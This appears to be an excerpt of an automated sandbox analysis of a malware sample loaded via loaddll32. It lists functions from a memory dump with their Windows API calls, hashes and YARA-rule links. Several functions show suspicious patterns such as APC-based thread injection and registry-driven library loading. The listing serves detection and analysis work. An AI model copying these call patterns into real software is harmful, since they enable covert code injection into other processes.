                  • Part of subcall function 046D265B: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046D26F5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                • String ID:
                • API String ID: 4198405257-0
                • Opcode ID: 66f55e1ab322c2195406f22e8481d49a091fd261bbe0790a1d6e165705f0e781
                • Instruction ID: 82836cdbb520adf644b4d386a7a31873f184a4eac3a4946404738e72848a3096
                • Opcode Fuzzy Hash: 66f55e1ab322c2195406f22e8481d49a091fd261bbe0790a1d6e165705f0e781
                • Instruction Fuzzy Hash: 48615C71A0124AEFDF14DFA5DC88EAE7BE9EB08305F044069E8059B201F735AA55DF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB9AF Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,046C8D64,?), ref: 046CB9CF
                • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CB9D9
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA02
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA10
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA1E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA2C
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA3A
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CBA48
                • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 046CBA72
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,046C8D64,?), ref: 046CBAF3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Load$Library$AllocDll@4FreeHeapImports
                • String ID:
                • API String ID: 1792504554-0
                • Opcode ID: 6566dea7cc3ec9769f261428f8d3a5711d5839b28c7a12f10b55eaf6ee62e490
                • Instruction ID: fe0b470ebdd100d997377218ed41c66548154f14fb69969034337024813faf19
                • Opcode Fuzzy Hash: 6566dea7cc3ec9769f261428f8d3a5711d5839b28c7a12f10b55eaf6ee62e490
                • Instruction Fuzzy Hash: 53414C71E0020AEFDB10DFAAE985DA977E8EB08704B1454AAE504DB241F73AFD45CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E513A Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046E515E
                  • Part of subcall function 046C4B8D: RegCloseKey.ADVAPI32(?,?,?,046E5181,00000000,00000000,00000000), ref: 046C4C14
                • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 046E518D
                • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046E519E
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046E51D8
                • RegCloseKey.ADVAPI32(?), ref: 046E5203
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046E5219
                • HeapFree.KERNEL32(00000000,?), ref: 046E522E
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046E5242
                • HeapFree.KERNEL32(00000000,?), ref: 046E5257
                • RegCloseKey.ADVAPI32(?), ref: 046E5260
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
                • String ID:
                • API String ID: 4138089493-0
                • Opcode ID: b12cd726ab1a58a91337b40f7f97ed63ac3ba78ea409f0c004817299b02dfd93
                • Instruction ID: 09bcb36f2d0f52d3356d89522fff94b0affb5744c8606a51aebf4595452d5e42
                • Opcode Fuzzy Hash: b12cd726ab1a58a91337b40f7f97ed63ac3ba78ea409f0c004817299b02dfd93
                • Instruction Fuzzy Hash: BE317571A01109FFCB12AFA6DC48DAE7BF9EB48304B144065F506EB121F736AE45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3FEE Relevance: 15.1, APIs: 10, Instructions: 97filememorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D0C78: memset.NTDLL ref: 046D0C9A
                  • Part of subcall function 046D0C78: CloseHandle.KERNEL32(?,?,?,?,?), ref: 046D0D44
                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 046E4035
                • CloseHandle.KERNEL32(?), ref: 046E4041
                • PathFindFileNameW.SHLWAPI(?), ref: 046E4051
                • lstrlenW.KERNEL32(00000000), ref: 046E405B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046E406C
                • wcstombs.NTDLL ref: 046E407D
                • lstrlen.KERNEL32(?), ref: 046E408A
                • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 046E40C9
                • HeapFree.KERNEL32(00000000,00000000), ref: 046E40DB
                • DeleteFileW.KERNEL32(?), ref: 046E40E9
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                • String ID:
                • API String ID: 2256351002-0
                • Opcode ID: a35cd557c1b00cb13ccdec95034b9bf13944938c26b34ca8edf3095ca77eafc9
                • Instruction ID: 9edaa365ac31565aa7772624b5796ab6bd1b4f9d5075172e6d71ceafa6bcd288
                • Opcode Fuzzy Hash: a35cd557c1b00cb13ccdec95034b9bf13944938c26b34ca8edf3095ca77eafc9
                • Instruction Fuzzy Hash: 6C311A75901109EFCF21AFA6DC88CAE7BB9FF44345F004469FA01A7210EB359E65DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2449 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                Download Yara Rule
                APIs
                • GetTickCount.KERNEL32 ref: 046E2459
                • CreateFileW.KERNEL32(046DA7DD,80000000,00000003,046EE268,00000003,00000000,00000000,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2476
                • GetLastError.KERNEL32(?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E251E
                  • Part of subcall function 046E41CF: lstrlen.KERNEL32(?,00000000,046E249E,00000027,046EE268,?,00000000,?,?,046E249E,?,00000001,?,046DA7DD,00000000,?), ref: 046E4205
                  • Part of subcall function 046E41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 046E4229
                  • Part of subcall function 046E41CF: lstrcat.KERNEL32(00000000,00000000), ref: 046E4231
                • GetFileSize.KERNEL32(046DA7DD,00000000,?,00000001,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24A9
                • CreateFileMappingA.KERNEL32(046DA7DD,046EE268,00000002,00000000,00000000,046DA7DD), ref: 046E24BD
                • lstrlen.KERNEL32(046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24D9
                • lstrcpy.KERNEL32(?,046DA7DD), ref: 046E24E9
                • GetLastError.KERNEL32(?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E24F1
                • HeapFree.KERNEL32(00000000,046DA7DD,?,046DA7DD,00000000,?,046C78A1,00000000), ref: 046E2504
                • CloseHandle.KERNEL32(046DA7DD,?,00000001,?,046DA7DD), ref: 046E2516
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                • String ID:
                • API String ID: 194907169-0
                • Opcode ID: 2e5de862c43ee32aeb747bb2f34816811963eaf6e7b3f3ed3a0e34bd514780bd
                • Instruction ID: 827caea17dd5d38a3854c24b7559d28e9dd0acd8fae7a131ce64fe72375fbc60
                • Opcode Fuzzy Hash: 2e5de862c43ee32aeb747bb2f34816811963eaf6e7b3f3ed3a0e34bd514780bd
                • Instruction Fuzzy Hash: 31212B71901209FFDB10AFA6D848AAEBFF9EB04351F108069F505EB250E7359E44DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E0929 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046E094F
                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 046E095B
                • GetModuleHandleA.KERNEL32(?,04C9978E,?,00000000,00000000), ref: 046E097B
                • GetProcAddress.KERNEL32(00000000), ref: 046E0982
                • Thread32First.KERNEL32(00000001,0000001C), ref: 046E0992
                • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 046E09AD
                • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 046E09BE
                • CloseHandle.KERNEL32(00000000), ref: 046E09C5
                • Thread32Next.KERNEL32(00000001,0000001C), ref: 046E09CE
                • CloseHandle.KERNEL32(00000001), ref: 046E09DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                • String ID:
                • API String ID: 2341152533-0
                • Opcode ID: e3075e6c109cc6c47c235c78827e6acf439277259b0a6d0583c32b84a4b58d8f
                • Instruction ID: 78a3c57389bf140460db2f30b91f97c9a9fe4effe6d61edc10d94499c57c5985
                • Opcode Fuzzy Hash: e3075e6c109cc6c47c235c78827e6acf439277259b0a6d0583c32b84a4b58d8f
                • Instruction Fuzzy Hash: F5214D72901119EFEF00AFA6DC84DFE7BF9EB08355B04512AF601AB150E775A9418B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D1D5B Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                Download Yara Rule
                APIs
                • SetEvent.KERNEL32(?,?,046CCE97), ref: 046D1D70
                  • Part of subcall function 046D810B: InterlockedExchange.KERNEL32(?,000000FF), ref: 046D8112
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,046CCE97), ref: 046D1D90
                • CloseHandle.KERNEL32(00000000,?,046CCE97), ref: 046D1D99
                • CloseHandle.KERNEL32(?,?,?,046CCE97), ref: 046D1DA3
                • RtlEnterCriticalSection.NTDLL(?), ref: 046D1DAB
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046D1DC3
                • Sleep.KERNEL32(000001F4), ref: 046D1DD2
                • CloseHandle.KERNEL32(?), ref: 046D1DDF
                • LocalFree.KERNEL32(?), ref: 046D1DEA
                • RtlDeleteCriticalSection.NTDLL(?), ref: 046D1DF4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                • String ID:
                • API String ID: 1408595562-0
                • Opcode ID: 4061952765b64dc707b8876abcae6791bd07bdc26cc2d19759c96de598ec99d0
                • Instruction ID: e3e532219e5be210fc3cff5d51d1d3f318537a27979a8ccaf510e0b4ff50cbb9
                • Opcode Fuzzy Hash: 4061952765b64dc707b8876abcae6791bd07bdc26cc2d19759c96de598ec99d0
                • Instruction Fuzzy Hash: A3115A31A40716EFDB20AB66DC48A9BB7F9FF557413040919F69397610FB7AF8008B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D373F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000001,00000000,?,?,046CBD83,?,00000001,?,?,?), ref: 046D3756
                • lstrlen.KERNEL32(?), ref: 046D3766
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D379A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 046D37C5
                • memcpy.NTDLL(00000000,?,?), ref: 046D37E4
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D3845
                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 046D3867
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocatelstrlenmemcpy$Free
                • String ID: W
                • API String ID: 3204852930-655174618
                • Opcode ID: aaa3a77c5030f1ec0ce768b7896e4b08374e9505e51bff40ef718e8e582c88d9
                • Instruction ID: 9c76128ba90fccc664737e48adce03729ed60380e03b86e86dc48fa289beec46
                • Opcode Fuzzy Hash: aaa3a77c5030f1ec0ce768b7896e4b08374e9505e51bff40ef718e8e582c88d9
                • Instruction Fuzzy Hash: E54114B2D00209EFDF11DF95CC84AAE7BB9EF14344F148469ED05A7310F735AA949BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB823 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                • memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                • memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                • GetLastError.KERNEL32 ref: 046CB8E2
                • HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                • String ID: (
                • API String ID: 2237239663-3887548279
                • Opcode ID: 992e896ed01eee2b164f9eed1e50e995cbd0fe03af65c1879e0a9af76c3adcfa
                • Instruction ID: ea8cc8a5f16726a64a0d9e24d2aad43437acf2516b65c4dfe9a19d60748de835
                • Opcode Fuzzy Hash: 992e896ed01eee2b164f9eed1e50e995cbd0fe03af65c1879e0a9af76c3adcfa
                • Instruction Fuzzy Hash: A9318136901309EFDB20DFA6E845AAB7BB8EF44750F004439FD05D7250F235AA55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E59C9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 046E59E4
                • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 046E5A9C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 046E5A32
                • GetProcAddress.KERNEL32(00000000,?), ref: 046E5A4B
                • GetLastError.KERNEL32(?,?,?,?), ref: 046E5A6A
                • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 046E5A7C
                • GetLastError.KERNEL32(?,?,?,?), ref: 046E5A84
                Strings
                • Software\Microsoft\WAB\DLLPath, xrefs: 046E59D5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                • String ID: Software\Microsoft\WAB\DLLPath
                • API String ID: 1628847533-3156921957
                • Opcode ID: f23806f20913169eed57bc02df41097083cea17361bd3450b1357946927b71e1
                • Instruction ID: 7c219b2b953fd6a77ea40379405262c3e65d5f038054172437f87c2b3a21d903
                • Opcode Fuzzy Hash: f23806f20913169eed57bc02df41097083cea17361bd3450b1357946927b71e1
                • Instruction Fuzzy Hash: 9E219771902115FFCB21AFEADC88CBEBBF8EB84754B140155F902AB110F6755D41EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CC5D9 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL ref: 046CC61A
                • memset.NTDLL ref: 046CC62E
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • GetCurrentThreadId.KERNEL32 ref: 046CC6BB
                • GetCurrentThread.KERNEL32 ref: 046CC6CE
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046CC775
                • Sleep.KERNEL32(0000000A), ref: 046CC77F
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046CC7A5
                • HeapFree.KERNEL32(00000000,?), ref: 046CC7D3
                • HeapFree.KERNEL32(00000000,00000018), ref: 046CC7E6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                • String ID:
                • API String ID: 1146182784-0
                • Opcode ID: 41da4611887a50066ecde44b0de82cac6f0a7eb8cad02d6a861cdebfdb0a7389
                • Instruction ID: 069402c748243dd8dfced44d26e6c4e0935f4863c5c7f1c1e9a0d10c47094e20
                • Opcode Fuzzy Hash: 41da4611887a50066ecde44b0de82cac6f0a7eb8cad02d6a861cdebfdb0a7389
                • Instruction Fuzzy Hash: 555106B5504301AFE750DF29D88486ABBE8FB99344F00592EF588DB210F735ED498FA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8ADC Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 046C8B19
                • memset.NTDLL ref: 046C8B2A
                • lstrcmpi.KERNEL32(046C158F,?), ref: 046C8B6A
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C8B96
                • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,046DCD0D), ref: 046C8BAA
                • memset.NTDLL ref: 046C8BB7
                • memcpy.NTDLL(-00000004,046C158F,00000000,00000000,00000000,046C158F,00000000,00000000,00000000,?,00000000), ref: 046C8BD0
                • memcpy.NTDLL(-00000005,?,00000007,-00000004,046C158F,00000000,00000000,00000000,046C158F,00000000,00000000,00000000,?,00000000), ref: 046C8BF3
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,046DCD0D), ref: 046C8C10
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 694413484-0
                • Opcode ID: 28a68541d3db255ea6ef86e582bb2caca80803d3c73294d24176f8f8ea9164ed
                • Instruction ID: a50e2794f8ca7e183380787408058f4290d2302dc6cee773763179e634e4cdd8
                • Opcode Fuzzy Hash: 28a68541d3db255ea6ef86e582bb2caca80803d3c73294d24176f8f8ea9164ed
                • Instruction Fuzzy Hash: 2C417EB1E00209EFDB20EFA5CC84EADBBB9EB14355F14446DE905A7250F735AE458B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E29AD Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,00000022,00000000), ref: 046E29C4
                • lstrlen.KERNEL32(?), ref: 046E29CC
                • lstrlen.KERNEL32(?), ref: 046E2A37
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2A62
                • memcpy.NTDLL(00000000,00000002,?), ref: 046E2A73
                • memcpy.NTDLL(00000000,?,?), ref: 046E2A89
                • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 046E2A9B
                • memcpy.NTDLL(00000000,046E83F8,00000002,00000000,?,?,00000000,?,?), ref: 046E2AAE
                • memcpy.NTDLL(00000000,?,00000002), ref: 046E2AC3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$lstrlen$AllocateHeap
                • String ID:
                • API String ID: 3386453358-0
                • Opcode ID: 9bd5ba262669075ac9aaeca38c0f19d634fae0e4aa5f06ba37f31fade11f44bd
                • Instruction ID: b18d440dfe258317100faee1b60d84bd5e346a8ca4e80b1872548631d0465d6d
                • Opcode Fuzzy Hash: 9bd5ba262669075ac9aaeca38c0f19d634fae0e4aa5f06ba37f31fade11f44bd
                • Instruction Fuzzy Hash: AE413B72D0120DEFCF10DFA9CC84AAEBBB9EF58214F144455ED05A7200F771AA50DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2D18 Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D20E3: RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D20EB
                  • Part of subcall function 046D20E3: RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D2100
                  • Part of subcall function 046D20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 046D2119
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046E2D69
                • lstrlen.KERNEL32(00000008,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2D78
                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 046E2D8A
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2D9A
                • memcpy.NTDLL(00000000,?,?,?,?,?,046C110F,00000000,00000000,-00000008,?,?), ref: 046E2DAC
                • lstrcpy.KERNEL32(00000020), ref: 046E2DDE
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046E2DEA
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046E2E42
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3746371830-0
                • Opcode ID: 07424dc7ffadbc0a87d290089b479d6e4146bea7f543e7db71851dea5dcab41a
                • Instruction ID: 06b984bdbf24dfa5dd44fb7ced0befe3ab2875098f297ebc3a4fb9f24be2d7be
                • Opcode Fuzzy Hash: 07424dc7ffadbc0a87d290089b479d6e4146bea7f543e7db71851dea5dcab41a
                • Instruction Fuzzy Hash: 1541A771901319EFEB219F26C854B6ABBF9FF18711F008469E8099B240F776E954CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C83F4 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C3CBC: RtlAllocateHeap.NTDLL(00000000,?), ref: 046C3CEE
                  • Part of subcall function 046C3CBC: HeapFree.KERNEL32(00000000,00000000,?,?,046D5EA7,?,00000022), ref: 046C3D13
                  • Part of subcall function 046C6652: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,046C8431,?,?,?,?,?,00000022,00000000), ref: 046C668E
                  • Part of subcall function 046C6652: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,046C8431,?,?,?,?,?,00000022,00000000), ref: 046C66E1
                • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C8466
                • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C846E
                • lstrlen.KERNEL32(?), ref: 046C8478
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C848D
                • wsprintfA.USER32 ref: 046C84C9
                • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 046C84E8
                • HeapFree.KERNEL32(00000000,?), ref: 046C84FD
                • HeapFree.KERNEL32(00000000,?), ref: 046C850A
                • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000), ref: 046C8518
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                • String ID:
                • API String ID: 168057987-0
                • Opcode ID: d2e44ff4ab4e21c71a17dcc9ff699ceab3f8dff7dad5f734ac920c956fb9ce58
                • Instruction ID: f066bf9ae36b46d061ae4ff763df71b25ca91e086285440162d4b39a6735c93e
                • Opcode Fuzzy Hash: d2e44ff4ab4e21c71a17dcc9ff699ceab3f8dff7dad5f734ac920c956fb9ce58
                • Instruction Fuzzy Hash: 8A31AD31600315AFEB21AF65DC40E6BBBE8EF84314F00482EF944A7251E775EC188BA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E36FE Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                • GetLastError.KERNEL32 ref: 046E3749
                • WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                • SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                • GetLastError.KERNEL32 ref: 046E37E5
                • CloseHandle.KERNEL32(00000006), ref: 046E37F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                • String ID:
                • API String ID: 2864405449-0
